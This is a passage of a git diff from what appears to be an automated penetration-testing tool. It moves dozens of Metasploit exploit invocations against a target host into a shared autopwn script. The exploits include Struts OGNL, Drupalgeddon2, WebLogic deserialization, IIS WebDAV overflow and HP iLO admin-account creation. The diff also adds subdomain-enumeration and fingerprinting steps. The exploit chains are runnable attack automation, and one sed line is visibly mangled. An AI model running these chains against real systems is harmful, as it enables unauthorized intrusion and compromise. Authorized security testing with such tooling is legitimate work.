$LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw 2> /dev/null + PORT="80" + SSL="false" + source modes/web_autopwn.sh fi fi \ No newline at end of file diff --git a/modes/normal_webporthttps.sh b/modes/normal_webporthttps.sh index e6666ef8..577e8b05 100644 --- a/modes/normal_webporthttps.sh +++ b/modes/normal_webporthttps.sh @@ -107,164 +107,8 @@ if [ "$MODE" = "web" ]; then fi cd $INSTALL_DIR if [ "$METASPLOIT_EXPLOIT" == "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port443-http_put.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw 2> /dev/null - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.raw 2> /dev/null - - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw 2> /dev/null + PORT="443" + SSL="true" + source modes/web_autopwn.sh fi fi \ No newline at end of file diff --git a/modes/recon.sh b/modes/recon.sh index e0e421af..991ac8b5 100644 --- a/modes/recon.sh +++ b/modes/recon.sh @@ -40,10 +40,39 @@ if [ "$RECON" = "1" ]; then echo "" echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt" fi + + + + + + + + if [ "$CENSYS_SUBDOMAINS" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + python $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | tee $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null + fi + + + + + + + + + if [ "$PROJECT_SONAR" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," |sort -u | grep $TARGET | tee $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null + fi cat $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null > /tmp/curl.out 2> /dev/null cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null + cat $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null + cat $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null cat $LOOT_DIR/domains/targets.txt 2> /dev/null >> /tmp/curl.out 2> /dev/null sort -u /tmp/curl.out 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt rm -f /tmp/curl.out 2> /dev/null diff --git a/modes/stealth.sh b/modes/stealth.sh index 7f0f8629..dce6e7b8 100644 --- a/modes/stealth.sh +++ b/modes/stealth.sh @@ -85,6 +85,7 @@ if [ "$MODE" = "stealth" ]; then fi dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null + dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null @@ -153,6 +154,12 @@ if [ "$MODE" = "stealth" ]; then wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 --max-time 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null + if [ "$WEBTECH" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + webtech -u http://$TARGET | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http.txt + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -160,7 +167,9 @@ if [ "$MODE" = "stealth" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING COMMENTS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null + cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null + sed -r "s/ /dev/null > $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null + rm -f $LOOT_DIR/web/webcomments-http-$TARGET 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED DISPLAYING SITE LINKS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -188,9 +197,9 @@ if [ "$MODE" = "stealth" ]; then echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" if 